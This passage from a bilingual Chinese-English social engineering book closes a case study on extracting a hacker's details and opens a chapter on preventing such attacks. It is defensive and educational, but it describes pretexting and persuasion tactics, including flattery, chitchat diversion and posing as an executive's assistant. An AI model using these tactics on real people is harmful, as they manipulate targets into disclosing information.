What might have enabled John to be able to do this without having to go home and have a practice session? Most likely these skills were something that John used daily or that he at least practiced often enough to make him agile in his use of them.

 

本案例研究的主要教训可能是熟能生巧。实际上,约翰本可以面对黑客,告诉他他是管理员,他已被记录,他的生活就此结束。各种威胁可能来来回回,他本可以尝试使用恐吓作为他的主要策略。

The main lesson in this case study is probably practice makes perfect. Realistically, John could have confronted the hacker, told him he was an admin and that he was being logged, and that his life was over. All sorts of threats could have flown back and forth and he could have tried to use fear as his main tactic.

 

最有可能的是,黑客逃离了现场,然后又回来试图格式化系统或造成更大的破坏以掩盖他的踪迹。相反,约翰反应非常迅速,能够收集到大量有关目标的有用信息。约翰后来利用目标的电子邮件地址和姓名以及一份完整的 Maltego 副本,非常清楚地了解了这个人的活动。

Most likely, the hacker would have fled the scene only to return later and try to format the system or do even more damage to cover his tracks. Instead, thinking very fast, John was able to farm a lot of usable information on his target. John later used the target’s e-mail address and name and a good copy of Maltego to get a very clear picture of this individual’s activities.

 

从分析这个故事中可以学到的另一个小教训是如何保持灵活。我的意思是学会顺其自然。当约翰开始从黑客那里“收集信息”时,他真的不知道这个人是黑客还是管理员。约翰的第一句话是“嘿,怎么了”,攻击者可以用很多方式来回答。由于不知道他会得到什么样的回应,约翰没有时间真正做好准备。他不得不尝试使用行话,并按照他想象中的黑客​​的方式做出反应。

Another minor lesson one can learn from analyzing this story is how to be fluid. What I mean by that is learning to go with the flow. When John started “gathering information” from the hacker he really didn’t know whether this person was a hacker or an admin. John’s first line, “Hey what’s up,” could have been answered by the attacker in many ways. Without knowing exactly the response he would get, John had no time to really prepare. He had to try to use lingo and react the way he imagined a hacker would.

 

约翰甚至更进一步。约翰意识到最好的途径是顺从,于是他假装自己是个“菜鸟”,也就是新手黑客,不懂多少东西,想让一个优秀聪明的真正的黑客来教他。为了满足黑客的自尊心,约翰让他吐露了各种事情,包括他所有的联系方式,甚至还有一张照片。

John took it even a step farther. Realizing that the best avenue was a submissive one, John put on the pretext of a “n00b,” or new hacker who didn’t know much and wanted a wonderful and intelligent real hacker to educate him. Feeding into the hacker’s ego, John got him to spill his guts about all sorts of things, including all his contact information and even a picture.

 

为什么案例研究很重要

Why Case Studies Are Important

 

这些案例研究只是众多案例中的一小部分,而且这些案例还远远不是最可怕的。政府、核电站、价值数十亿美元的公司、公用事业电网甚至整个国家每天都会成为恶意社交工程攻击的受害者,这还不包括每分钟都在发生的诈骗、身份盗窃和抢劫等个人事件。

These case studies are just a few of the stories that are out there, and these are by far not the scariest. Every day governments, nuclear power plants, multibillion-dollar corporations, utility grids, and even whole countries fall victim to malicious social engineering attacks, and that doesn’t even include the personal stories of scams, identity theft, and robbery that are occurring by the minute.

 

尽管读完这些故事让人感到悲伤,但最好的学习方法之一就是回顾案例研究。各个领域的专家都采用这种方法。心理学家和医生回顾了无数小时的录音和访谈,以研究人们在感受到某些情绪时使用的微表情。

As sad as reading all these stories is, one of the best ways to learn is by reviewing case studies. Experts from all fields utilize this methodology. Psychologists and doctors review countless hours of tapes and interviews to study the microexpressions people use when feeling certain emotions.

 

说服专家会审查、分析和研究正面和负面说服的案例。这样做可以帮助他们发现影响人们的微妙之处,并了解如何利用这些案例来学习和保护他们的客户。

Persuasion experts review, analyze, and study accounts of positive and negative persuasion. Doing so helps them to pick up on the subtle areas that affect people and see how they can be used to learn and to protect their clients.

 

执法人员每天都会查看案例研究,以了解犯罪分子的动机。按照这个思路,刑事调查员会分析和剖析恶意人员的各个方面,包括他吃什么、他如何与他人互动、他的想法是什么以及是什么让他做出反应。所有这些信息有助于他们真正了解罪犯的心理。

Law enforcement reviews case studies as part of their everyday lives to learn what makes a criminal tick. Along those lines, criminal investigators analyze and dissect every aspect of a malicious person, including what he eats, how he interacts with others, what he thinks about, and what makes him react. All of this information helps them to truly understand the mind of the criminal.

 

专业分析人员也使用同样的方法来锁定和抓捕“坏人”。同样,专业社交工程师不仅通过研究自己的案例研究,而且通过研究自己实践中的案例和在新闻中找到的恶意账户,学到了很多东西。通过查看案例研究,社交工程师可以真正开始看到人类心理的弱点,以及为什么社交工程框架中的策略如此容易奏效。这就是为什么我一直在努力确保www.social-engineer.org上的框架将包含最新的网络故事和案例研究,您可以使用它们来提高您的技能。

These same methods are how professional profilers target and catch the “bad guys.” In the same fashion, professional social engineers learn a lot by studying not only their own case studies but also cases in their own practice and malicious accounts they can find in the news. By reviewing case studies a social engineer can truly start to see the weakness of the human psyche and why the tactics in the social engineering framework work so easily. That is why I have been working hard to make sure the framework on www.social-engineer.org will include updated web stories and case studies that you can use to enhance your skills.

 

最终,所有这些手段都奏效了,因为人类生来就具有信任、同情心、同理心和帮助他人的愿望。这些品质是我们每天都要与人类同胞互动时不应该失去的。但与此同时,这些品质往往被恶意的社会工程师所利用。我似乎在鼓励我们每个人都变成一个冷酷无情、像机器人一样四处走动的生物。虽然这肯定会保护你免受大多数社会工程攻击,但它会让生活变得乏味。我提倡的是提高认识、接受教育和做好准备。

In the end, all of these exploits worked because people are designed to be trusting, to have levels of compassion, empathy, and a desire to help others. These are qualities that we should not lose as we have to interact with our fellow humans every day. Yet at the same time, these qualities are the very things that are more often than not exploited by malicious social engineers. It may seem that I am promoting each of us to become a hardened, emotionless creature that walks around like a robot. Although that would definitely keep you protected from most social engineering attempts, it would make life dull. What I am promoting is being aware, educated, and prepared.

 

概括

Summary

 

通过教育实现安全是本书的宗旨。只有当你意识到存在的危险,只有当你知道“罪犯”的想法,只有当你准备好直面邪恶并接受它时,你才能真正保护自己。为此,本书的最后一章讨论了如何预防和减轻社会工程攻击。

Security through education is the mantra of this book. Only when you are aware of the dangers that exist, only when you know how the “criminal” thinks, and only when you are ready to look that evil in the eye and embrace it can you truly protect yourself. To that end, the final chapter of this book discusses how to prevent and mitigate social engineering attacks.

 

第九章

Chapter 9

 

预防和缓解

Prevention and Mitigation

 

前面几章向您展示了社会工程师欺骗和诈骗目标以使其泄露有价值信息的所有方法和方式。它们还描述了社会工程师用来影响和操纵人们的许多心理学原理。

The preceding chapters show you all the methods and ways that social engineers trick and scam targets into divulging valuable information. They also describe many of the psychological principles that social engineers use to influence and manipulate people.

 

有时在我发表演讲或进行安全培训后,人们会显得非常偏执和害怕,并会说这样的话:“看起来甚至尝试安全都是没有希望的。我该怎么办?”

Sometimes after I give a speech or security training, people will look very paranoid and scared and say something like, “It just seems there is no hope to even attempt security. How do I do it?”

 

这是个好问题。我提倡制定良好的灾难恢复计划和事件响应计划,因为现在看来,问题不再是“是否”会被黑客入侵,而是“何时”会被入侵。你可以采取预防措施,至少为自己争取到安全的机会。

That is a good question. I promote having a good disaster-recovery plan and incident response plan because nowadays it seems that it is not a matter of “if” you will get hacked, but “when.” You can take precautions to give you at least a fighting chance at security.

 

缓解社会工程学攻击并不像确保硬件安全那么简单。使用传统的防御性安全,您可以投入大量资金购买入侵检测系统、防火墙、防病毒程序和其他解决方案来维护周边安全。使用社会工程学攻击,没有可以附加到您的员工或您自己身上以保持安全的软件系统。

Social engineering mitigation is not as easy as ensuring hardware security. With traditional defensive security you can throw money into intrusion detection systems, firewalls, antivirus programs, and other solutions to maintain perimeter security. With social engineering no software systems exist that you can attach to your employees or yourself to remain secure.

 

在本章中,我介绍了我告诉客户可以采取的六个主要步骤,以防止和减轻社会工程攻击:

In this chapter I present the top six steps I tell my clients they can take to prevent and mitigate social engineering attempts:

 
 
     
  • 学习识别社会工程攻击
  • Learning to identify social engineering attacks
  •  
     
  • 创建个人安全意识计划
  • Creating a personal security awareness program
  •  
     
  • 提高对社会工程师所寻求信息的价值的认识
  • Creating awareness of the value of the information that is being sought by social engineers
  •  
     
  • 保持软件更新
  • Keeping software updated
  •  
     
  • 开发脚本
  • Developing scripts
  •  
     
  • 从社会工程审计中学习
  • Learning from social engineering audits
  •  
 

这六点归结起来就是要创造一种安全意识文化。安全意识不是每年一次的 40 分钟、60 分钟或 90 分钟的课程。而是要创造一种文化或一套标准,每个人都承诺在自己的一生中加以运用。这不仅关乎被视为“重要”的工作或网站,而是人们对待整体安全的方式。

These six points all boil down to creating a security awareness culture. Security awareness is not about a 40-, 60-, or 90-minute program once every year. It is about creating a culture or a set of standards that each person is committed to utilizing in his or her entire life. It is not just about work or websites deemed to be “important,” but it is the way one approaches being secure as a whole.

 

本章涵盖了上述六点,以及如何创建安全意识文化成为抵御恶意社会工程师的最佳防御。

This chapter covers the aforementioned six points and how creating a security awareness culture can be the best defense against a malicious social engineer.

 

学习识别社会工程攻击

Learning to Identify Social Engineering Attacks

 

预防和缓解社会工程攻击的第一步是了解这些攻击。您不必深入研究这些攻击,只需知道如何重新创建恶意 PDF 或创建完美的骗局即可。但了解单击恶意 PDF 时会发生什么以及寻找哪些迹象来确定是否有人试图欺骗您,可以帮助保护您。您需要了解威胁以及它们如何对您造成影响。

The first stage in social engineering prevention and mitigation is to learn about the attacks. You don’t have to dive so deep into these attacks that you know how to recreate malicious PDFs or create the perfect con. But understanding what happens when you click a malicious PDF and what signs to look for to determine whether someone is trying to trick you can help protect you. You need to understand the threats and how they apply to you.

 

举个例子:你珍视你的家和里面的东西,尤其是家里的人。你不会等到第一次发生火灾才想办法计划、预防和减轻火灾的危险。相反,你会安装烟雾探测器,并规划火灾时的逃生路线。此外,如果孩子着火了,你可能会用“停下、趴下、打滚”这句话来训练他们。你教他们如何用手摸门来感受热度,并保持低位以避免吸入烟雾。所有这些方法都是在真正发生火灾并不得不应对火灾带来的破坏之前预防或准备火灾的方法。

Here’s an illustration: You value your home and the things in it, but especially the people in your home. You do not wait to have your first fire to figure out how to plan, prevent, and mitigate its danger. Instead you install smoke detectors and plan out an escape route in case of a fire. In addition, you might train your children with the phrase to, “Stop, drop, and roll” if they are on fire. You teach them how to feel the door for heat and to stay low to avoid smoke inhalation. All of these methods are ways to prevent or prepare for a fire before you have a real fire and have to deal with the devastation it brings.

 

同样的原则也适用于保护您自己和您的公司免受社会工程攻击。不要等到攻击发生才知道它们的破坏力有多大。不要以为我是自私的,但我提倡进行社会工程审计,定期测试您的员工抵御这些攻击的能力,并进行后续培训。

The same principle applies to protecting yourself and your company from social engineering attacks. Do not wait for the attack to occur to learn about how devastating they can be. Don’t think I’m self-serving, but I promote social engineering audits to regularly test your employees’ ability to withstand these attacks, and following up with training.

 

教会你自己和你的员工在面对这些类型的攻击时如何“停止、放弃和翻滚”。关于社会工程师如何攻击公司的最新消息是什么?了解它们可以成为第一道防线,就像了解火灾会对你家造成什么影响一样。了解现代社会工程师和身份窃贼使用的不同方法。你可以在 www.social-engineer.org/framework/Social_Engineering_In_The_News 找到新闻报道和社会工程师、骗子、身份窃贼等的例子的档案

Teach yourself and your employees how to “stop, drop, and roll,” so to speak, when it comes to these types of attacks. What are the latest news stories on how social engineers are attacking companies? Knowing them can be a first line of defense, the same as knowing what a fire can do to your home. Learn the different methods that modern social engineers and identity thieves use. You can find an archive of news stories and examples of social engineers, con men, identity thieves, and the like at www.social-engineer.org/framework/Social_Engineering_In_The_News.

 

另一个不错的步骤是阅读这本书。它充满了社会工程师用来操纵目标的所有方法和原则。这本书不仅仅是故事和精彩黑客的汇编;它还分析了恶意社会工程师使用的思维和策略。

Another good step is reading this book. It is full of all the methods and principles that social engineers use to manipulate their targets. This book is more than just a compilation of stories and wonderful hacks; it offers an analysis of the thinking and tactics used by the malicious social engineer.

 

还可以查看www.social-engineer.org网站上资源区的视频,其中演示了漏洞利用的实际操作。普通用户观看这些视频的目的不是了解如何自己执行这些攻击,而是了解 SE 如何执行攻击。

Also check out the videos on the www.social-engineer.org site, in the Resources area, which demonstrate exploits in action. The average user does not need to watch them with the intent of understanding how to perform these attacks himself, but to understand how an SE performs the attack.

 

基本上,你对这些攻击的发生方式了解得越多,你就越容易在“野外”识别它们。如果你了解 SE 尝试中使用的肢体语言、表情和短语,当你听到或看到有人使用这些方法时,你会竖起耳朵。

Basically, the more you know about how these attacks occur, the easier you can identify them in the “wild.” Being aware of the body language, expressions, and phrases used in an SE attempt will make your ears perk up when you hear or see someone utilizing these methods.

 

您不需要花费大量时间来了解 SE 方法。但是,偶尔花几分钟阅读新闻和阅读www.social-engineer.org或其他网站上的故事可以帮助您了解目前针对公司使用的方法。

You don’t need to spend tons of time learning about SE methods. However, spending a few minutes now and then reading the news and reading stories on www.social-engineer.org or other sites can help you see the methods being used now against companies.

 

在您拥有良好的知识基础知识和审计经验后,下一步,创建安全意识文化,将变得很简单。

After you have a good basis of knowledge and an audit under your belt, the next step, creating a security-minded culture, will seem simple to develop.

 

创建个人安全意识文化

Creating a Personal Security Awareness Culture

 

2010 年 7 月,我作为安全专家小团队的一员,在 Defcon 18 上举办了首批有组织的专业级社会工程学竞赛之一。来自世界各地的一些最优秀、最聪明的人才每年都会来到内华达州拉斯维加斯演讲、教学和学习。

In July of 2010 I was part of a small team of security professionals that held one of the first organized and professional-level social engineering contests at Defcon 18. Some of the best and brightest minds from around the globe come to Las Vegas, Nevada, once a year to speak, teach, and learn.

 

我和我的团队认为这是一个绝佳的机会,可以举办一场比赛来展示美国企业是否容易受到这种攻击媒介的攻击(响应“比赛”)。我们组织了这次比赛,让感兴趣的人报名参加社会工程的两个阶段:信息收集和主动攻击。

My team and I decided it would be a great opportunity to hold a contest that would showcase whether corporate America is vulnerable to this attack vector (responding to a “contest”). We organized the contest by having interested people sign up to take part in two stages of social engineering : information gathering and active attacks.

 

为了确保竞赛合法、合乎道德,我们不希望任何人成为受害者,也不会收集任何社会安全号码、信用卡和个人身份信息。我们的目标是不让这些人被解雇。此外,我们的目标是不让任何一家公司难堪,所以我们还决定不收集公司的密码或其他个人安全相关信息。相反,我们制定了一份大约 25-30 个“标志”的清单,范围从公司是否有内部餐厅,到谁负责垃圾处理,到它使用什么浏览器,到它使用什么软件打开 PDF。最后,我们从美国企业的所有业务领域中选择了目标公司:天然气公司、科技公司、制造商、零售业,以及介于两者之间的所有行业。

To keep the contest legal and moral we did not want any person victimized, and no Social Security numbers, credit cards, and no personal identifying information would be gathered. Our goal was not to get any of these people fired. In addition our goal was not to embarrass any particular company, so we decided also no passwords or other personal security–related information from the companies. Instead we developed a list of about 25–30 “flags” that ranged from whether the company had an internal cafeteria, to who handles its trash disposal, to what browser it uses, and to what software it uses to open PDFs. Finally, we chose target companies from all sectors of business in corporate America: gas companies, tech companies, manufacturers, retail, and everything in between.

 

每位参赛者都会被秘密分配到一家目标公司,参赛者有两周的时间被动收集该公司的信息。这意味着参赛者不得联系该公司、向其发送电子邮件或以任何方式试图通过社交工程获取信息。相反,他们必须使用网络、Maltego 和其他工具收集尽可能多的信息,并将他们发现的所有信息输入到一份专业的报告中。

Each contestant was assigned one target company in secret, on which he had two weeks to do passive information gathering. That meant contestants were not allowed to contact the company, send it emails, or in any way try to social engineer information out of it. Instead they had to use the web, Maltego, and other tools to gather as much information as possible and enter all they found into a professional-looking report.

 

根据收集到的信息,我们希望参赛者开发出几个他们认为在现实世界中可行的攻击载体。然后,参赛者必须来到拉斯维加斯的 Defcon,坐在隔音室里,给他们的目标打 25 分钟的电话,实施他们的攻击载体,看看他们能获得什么信息。

From the information gathered we wanted contestants to develop a couple of plausible attack vectors that they thought would work in the real world. Then contestants had to come to Defcon in Las Vegas, sit in a soundproof booth, and make a 25-minute phone call to their target to implement their attack vector and see what information they could obtain.

 

我可以在接下来的 20-30 页中告诉你那场比赛发生了什么以及结果如何,但我们发现一件事是:每个参赛者都从目标那里获得了足够的信息,以至于该公司无法通过安全审计。无论参赛者的经验水平和借口如何,参赛者都成功实现了他们的目标。有关 CTF 和发生的事情的完整报告,请访问www.social-engineer.org/resources/sectf/Social-Engineer_CTF_Report.pdf

I could spend the next 20–30 pages telling you what happened at that contest and what the outcome was, but one thing we found was this: Every contestant obtained enough information out of the targets that the company would have failed a security audit. Regardless of the experience level of the contestant and the pretext, the contestants were successful in accomplishing their goals. For a full report about the CTF and what occurred, visit www.social-engineer.org/resources/sectf/Social-Engineer_CTF_Report.pdf.

 

现在来谈谈这里适用的内容——安全意识。重视安全的公司会通过电话、互联网或亲自培训员工如何意识到潜在的安全风险。我们发现这些公司的安全意识处于失败阶段。为什么?这些财富 500 强公司在安全、培训、教育和服务方面花费了数百万甚至更多,旨在保护员工,为什么会在安全意识方面失败呢?

Now on to what applies here—security awareness. Corporations that care about security have programs where they train their employees how to be aware of potential security risks via phone, Internet, or in person. What we found was that security awareness in those companies was at failure stage. Why? How could it be that these Fortune 500 companies that spend millions or more on security, training, education, and services designed to protect their employees could be failing at security awareness?

 

这就是我本节标题中的观点——安全意识并非员工个人的。在我的专业实践中,当我与员工谈论他们对攻击的感受时,他们经常会这样回答:“这不是我的数据;我为什么要关心?”这种态度表明,这些公司试图灌输的安全意识从未打动人心;它不重要、无效,最重要的是,不是个人的。

That is my point in the title to this section—security awareness is not personal to employees. Often in my professional practice when I talk with employees about their feelings about an attack they respond with something like, “It is not my data; what do I care?” This attitude shows that the security awareness that these companies were trying to instill never hit home; it was not important, effective, and most importantly, not personal.

 

在审查所谓的安全意识材料和方法时,我发现它们很无聊、很愚蠢,而且不是为了使参与者互动或思考。简短的 DVD 演示以散弹枪式的方式涵盖了大量内容,用大量微小的事实轰炸参与者,无法让参与者深入理解。

In reviewing much of the material and methods available for so-called security awareness, what I have found is that it is boring, silly, and not geared to make the participant interact or think. Short DVD presentations that cover a ton of things in a shotgun approach that blasts the participant with a lot of tiny little facts are not designed to sink in too deep.

 

我向你们提出挑战,无论是作为公司还是个人,你们都要创建一个程序,让大家参与进来,与大家互动,并深入探讨安全意识。不要只是告诉员工为什么设置长而复杂的密码是个好主意,而是要向他们展示破解简单密码的速度有多快。当我被要求帮助客户进行安全意识培训时,有时我会让员工来到我的电脑前,输入她认为安全的密码。我在发布有关密码的任何信息之前都会这样做。然后,当我开始介绍该部分时,我会启动一个针对该密码的破解程序。通常在一两分钟内,密码就会被破解,然后我会向房间里的人透露我偷偷输入电脑的密码。它对每个人产生的直接而剧烈的影响是极其巨大的。但经过多次这样的演示后,员工们会评论说,他们现在明白了拥有一个好的密码有多重要。

What I challenge you to do as a company or even as an individual is to create a program that engages, interacts, and dives deep into security awareness. Instead of just telling your employees why having long and complex passwords is a good idea, show them how quickly one can crack an easy password. When I am asked to help perform security awareness training for a client, sometimes I ask an employee to come up to my computer and type in a password that she feels is secure. I do this before I release any information about passwords. Then as I start my presentation on that section I start a cracker against that password. Usually within a minute or two the password is cracked and I reveal to the room the password that was secretly typed into my computer. The immediate and drastic effect it has on each person has an extreme impact. But after numerous demonstrations like that employees will comment on how they now understand how serious having a good password is.

 

当我讨论电子邮件中的恶意附件时,我不必向员工展示如何制作恶意 PDF,但我会向他们展示当恶意 PDF 在受害者和攻击者的计算机上打开时是什么样子。这有助于他们理解简单的崩溃可能会导致灾难。

When I discuss the topic of malicious attachments in email, I do not have to show employees how to craft a malicious PDF but I do show them what it looks like from both the victim’s and the attacker’s computers when a malicious PDF is opened. This helps them understand that a simple crash can lead to devastation.

 

当然,这种教学方法会产生很多恐惧,虽然这不是目标,但它并不是一个糟糕的副产品,因为员工会更好地记住它。但目标是让他们不仅考虑他们在工作中和办公室电脑上所做的事情,还要考虑他们自己的银行账户、家用电脑,以及他们如何在个人层面上对待安全。

Of course, this teaching method produces a lot of fear, and although that is not the goal, it is not a terrible side product, because employees will remember it better. But the goal is to make them think not just about what they do not only at work and with their office computers, but also their own bank accounts, home computers, and how they treat security on a personal level.

 

我希望每个听过安全演讲或读过这本书的人都能反思自己与整个互联网的互动方式,并认真改变重复使用密码、在非安全位置存储密码或个人信息以及连接互联网的方式。我已经数不清有多少次看到有人坐在星巴克中心使用免费 Wi-Fi 查询银行账户或进行在线购物。虽然我很想冲上前去对那个人大喊大叫,告诉她如果有不法之徒与她坐在同一个网络上,她的整个生活很快就会天翻地覆,但我没有这么做。

I want each person who hears a security presentation or reads this book to review how he interacts with the Internet as a whole and make serious changes to reusing passwords, storing passwords or personal information in non-secure locations, and to where they connect to the Internet. I cannot tell you how many times I have seen a person sitting in the center of Starbucks on her free Wi-Fi checking a bank account or making an online purchase. As much as I want to go up and yell at that person and tell her how quickly her whole life can be turned upside down if the wrong person is sitting on that same network with her, I don’t.

 

我希望阅读本文的人也考虑一下他们是如何通过电话提供信息的。骗子和诈骗者使用许多途径从老年人、经济困难的人和其他人那里窃取信息。电话仍然是一种非常有效的手段。了解供应商、银行或供应商关于他们会在电话中询问什么和不会询问什么的政策可以帮助您避免许多陷阱。例如,许多银行在其政策中列出,他们永远不会打电话询问社会安全号码或银行账户号码。了解这一点可以保护您免受可能耗尽您一生积蓄的骗局的侵害。

I want people who read this to also think of how they give out information over the phone. Con men and scam artists use many avenues to steal from the elderly, those having hard economic times, and everyone else. The phone still remains a very powerful way to do this. Being aware of the vendors’, banks’, or suppliers’ policies on what they will and will not ask for over the phone can help you avoid many of the pitfalls. For example, many banks list in their policies that they will never call and ask from a Social Security number or bank account number. Knowing this can safeguard you for falling for a scam that can empty your life savings.

 

将安全意识称为“计划”表明这是一项持续性工作。计划意味着您安排时间不断自我教育。获得所有这些有用信息后,您就可以使用它来制定一个可以帮助您保持安全的计划。

Calling security awareness a “program” indicates that it is something ongoing. A program means you schedule time to continually educate yourself. After you obtain all this useful information, then you can use it to develop a program that will help you to stay secure.

 

意识到你被要求提供的信息的价值

Being Aware of the Value of the Information You Are Being Asked For

 

再次回顾 Defcon 18 社会工程学竞赛,从中我们学到了另一个宝贵的教训——当信息被认为没有价值或价值很小时,人们就不会花太多精力去保护它。

Referring to the Defcon 18 social engineering contest again, in it we learned another valuable lesson—when the information is perceived as having no or little value, then little effort is placed on protecting it.

 

这是一句老生常谈的话,但事实证明,许多目标都愿意交出有关他们的餐厅、垃圾处理等信息。您必须意识到您拥有的数据的价值,并意识到社会工程师可能会使用某种策略来降低这些信息在您眼中的价值。

This is heavy-duty statement, but was proven true with how many targets willingly handed over information on their cafeterias, waste removal, and so much more. You must realize the value of the data that you have and be aware of a tactic a social engineer might use to reduce the value of this information in your eyes.

 

在向某人透露信息之前,先确定打电话或与您互动的人是否值得获得这些信息。人类天生就有这种想要帮助和帮助那些我们认为需要帮助的人的愿望。这是社会工程师操纵目标交出有价值信息的主要方式。分析与您互动的人并确定她是否值得获得她所要求的信息可以避免您成为受害者的尴尬和伤害。

Before giving out information to someone, determine whether the person who is calling or interacting with you deserves it. Humans have this built-in desire to want to help and to be helpful to those whom we perceive need it. It is a major way a social engineer manipulates a target into handing over valuable information. Analyzing the person with whom you are interacting and determining whether she deserves the information she is asking for can save you the embarrassment and damage of falling victim.

 

例如,在 Defcon 的社会工程学竞赛中,一名参赛者借口说自己是一家大型杀毒软件公司的客户。他打电话来反映一个严重问题 — — 他的电脑无法上网,他认为这是杀毒软件的问题,希望技术支持代表做一件简单的事情 — — 浏览一个网站。

For example, in the social engineering contest at Defcon one contestant had a pretext that he was a customer of a major antivirus company. He called in with a serious problem—his computer couldn’t get online and he felt it was due to something the antivirus was doing and wanted the technical support representation to do one simple thing—browse to a website.

 

恶意 SE 经常使用这种攻击媒介。通过将受害者引导到嵌入恶意代码或恶意文件的网站,他们可以访问目标的计算机和网络。在比赛的案例中,该网站根本不是恶意的,但它是为了表明,如果这是一次恶意攻击,它就会成功。

Malicious SEs often use this attack vector. By driving a victim to a website embedded with malicious code or malicious files they can gain access to a target’s computer and network. In the case of the contest, the website was not malicious at all, but it was to show that if this were a malicious attack it would have been successful.

 

参赛者第一次尝试的思路是这样的:“我无法浏览我的网站,我认为是你们的产品阻止了我。你能通过访问这个网站来检查一下,这样我就能确定是不是你们的软件吗?”

The first attempt was laid out like this by the contestant: “I cannot browse to my website and I think your product is blocking me. Can you check by going to this site so I know for sure whether it is your software or not?”

 

技术支持代表很好地回答道:“先生,我们的产品不会阻止您访问该网站;我能否访问该网站并不重要。”他拒绝了该请求。

The technical support representative answered well by saying, “Sir, our product would not block you from going to that site; it wouldn’t matter if I can go there or not.” He declined the request.

 

参赛者并没有就此放弃,又说了一会儿后,他再次尝试道:“我知道你说过你的产品不会屏蔽网站,但在我安装你的软件之前,它一直有效,所以你能帮我检查一下吗?”

The contestant did not give up there; after talking a bit more he again tried, “I know you said your product would not block the site, but it worked until I installed your software, so can you please check for me?”

 

他的请求再次被拒绝:“先生,很抱歉给您带来不便,但我们的产品无法阻止您,我访问网站也无法帮助您解决问题。”

Again he was declined his request: “Sir, I am sorry for that inconvenience but again our product would not block you and my going to the site will not help you fix the problem.”

 

就在请求似乎要被彻底拒绝的时候,参赛者做了最后的努力,说道:“先生,如果您能帮我访问一下这个网站,我会感觉好一些。请问您能帮帮我吗?”

It seemed as if the request was going to be rejected for good when the contestant tried one last-ditch effort and said, “Sir, it would make me feel better if you would just try going to this site for me. Please, can you help me out?”

 

这个简单的请求让我们的技术支持代表非常恼火,他打开浏览器直接进入了网站。他的想法是正确的,甚至对安全意识的回答也是正确的,但最终他希望他的“客户”能“感觉好一些”,于是答应了他的请求。如果这是一次恶意攻击,这可能会让该公司陷入巨大的陷阱。

This simple request put our technical support rep over the edge and he opened his browser and went right to the site. He had the right idea, he even had the right security awareness answer, but in the end he wanted his “customer” to “feel better” and honored his request. This could have led that company to a major pitfall if it were a malicious attack.

 

技术支持代表知道这些信息与该特定呼叫无关。像他一样,您必须下定决心分析所要求的信息是否值得,是否与您互动的人相关。从另一个角度来看这种情况,如果参赛者是合法客户,而代表拒绝访问该网站,会发生什么最糟糕的情况?

The technical support representative knew that this information was not relevant to that particular call. Like him, you must be determined to analyze whether the information being asked for is deserved and relevant to the person with whom you are interacting. Approaching this scenario from the other angle, what if the contestant were a legitimate customer and the rep had declined to go to that website—what is the worst that could have happened?

 

顾客可能会因为自己的要求被拒绝而感到有些不高兴,但这仍然不会改变结果。他所拥有的产品并不是导致他遭遇困境的原因。

The customer might have been a little upset at being declined the request he wanted but it still would not have changed the outcome. The product he had was not the cause of his woes.

 

社会工程师经常会用魅力来开启关于天气、工作、产品等任何事情的对话,并利用魅力来透露想要的信息。这时,良好的安全意识政策就会发挥作用——教育您的员工了解可能对他们使用哪些策略可以防止他们因恐惧而采取行动。

A social engineer often uses charm to start a conversation about the weather, work, the product, anything at all, and uses it to reveal the information sought. This is where a good security awareness policy comes into play—educating your employees about what tactics might be used against them can save them from acting out of fear.

 

在一次审计中,我以首席财务官助理的身份作为借口。呼叫中心的员工担心拒绝如此高层管理人员的请求会丢掉工作。为什么?他们没有接受适当的教育,不知道拒绝该请求不会让他们丢掉工作。同时,应该制定协议,让员工知道何时提出信息请求是合适的。

In one audit the pretext I used was being the assistant to the CFO. The call center employees had a fear of losing their jobs for rejecting the requests from such a high-level management. Why? They are not given the proper education to know that rejecting that request would not cost them their jobs. At the same time protocols should be in place for the employee to know when a request for information is proper.

 

被要求提供的信息的感知价值与受过教育和有意识的人密切相关,他们知道即使是微不足道的数据也可能导致大规模泄露。知道电话另一端的人实际上不需要知道自助餐厅食品加工公司的名称,可以帮助员工做出适当的回答。如果你是雇主,那么就帮助你的员工制定对这些要求的答案。在大多数情况下,简单的“抱歉,我没有这些信息;如果您需要,请联系我们的采购部门。”或者“很抱歉,我无权泄露这些信息,但你可以发送电子邮件至info@company.com索取其中一些信息”,可以在很大程度上压制许多社会工程学努力。

The perceived value of the information being asked for closely ties in with an educated and aware person knowing that even minor tidbits of data can lead to a massive breach. Knowing that the person on the other end of the phone doesn’t really need to know what the name of the food preparation company for the cafeteria can help an employee to answer appropriately. If you are an employer then help your employees develop answers to these requests. In most cases a simple, “Sorry, I don’t have that information; please contact our purchasing department if you want that.” Or “I’m sorry I am not allowed to divulge that information but you can send an email to info@company.com to request some of this info,” can go a long way toward quashing many social engineering efforts.

 

我之前提到过,营造一种让信息看起来不那么有价值的氛围也是社会工程师用来让人们自由泄露这些“不重要”信息的一种策略。

I mentioned earlier that creating an atmosphere that makes information seem less valuable is also a tactic used by social engineers to get people to freely divulge this “unimportant” information.

 

再次使用竞赛示例,一位参赛者被要求提供一些身份信息。他的借口是一家受雇进行内部审计的公司,当目标想要核实他是谁时,他要求从申请表上获取一些信息。我们的参赛者假装向一位假想的同事靠过去,说道:“简,你的目标公司的先生们想要申请表上的 ID 号,你能帮我个忙,从比尔的桌子上拿一下吗?”

Using the contest example again, one contestant was asked to provide some identifying information. His pretext was a company that was hired to do an internal audit and when the target wanted to verify who he was he asked for something off of the requisition form. Our contestant pretended to lean over to an imaginary co-worker and said, “Jane, the gentlemen from Your-Target-Company wants the ID number from the requisition, can you do me a favor and grab it from Bill’s desk?”

 

当“简”去拿表格时,参赛者与目标闲聊起来。“德克萨斯州的天气怎么样?”和“你去过查理酒吧吗?”升级为“谁负责自助餐厅的食物?”和“想看看我们正在开发的很酷的网站吗?”

As “Jane” went to get the form the contestant engaged the target in idle chitchat. “How’s the weather in Texas?” and “Have you ever been to Charlie’s Pub?” escalated into things like, “Who handles the food for the cafeteria?” and “Want to see a cool website we are working on here?”

 

这一切都发生在他“等待”身份证号码的时候。社会工程师每天都会使用这种策略。转移注意力和魅力是许多借口的关键工具。在“闲聊”期间要求提供的信息被认为价值较低,因为要求提供这些信息的时间较长。如果 SE 在“核实审计结果”时问同样的问题,他的态度会有所不同,但由于他是在友好交谈中提出这个问题,所以很多信息都是免费提供的。

All this happened while he was “waiting” for the ID number. Social engineers use this tactic every day. Diversion and charm are key tools in many pretexts. Information that is asked for during “chitchat” is perceived as having less value because of the time in the conversation it is asked for. If the SE had asked that same question when he was “verifying his audit findings” it would have been met with a different attitude, but because he asked it during a friendly conversation so much information was given freely.

 

缓解这种 SE 策略的方法是仔细考虑您计划发布的信息的价值,无论在对话中何时被要求提供这些信息。在前面的例子中,目标在继续任何对话之前只需等待该 ID 号,这将是非常合适的,并且可以避免他被欺骗。

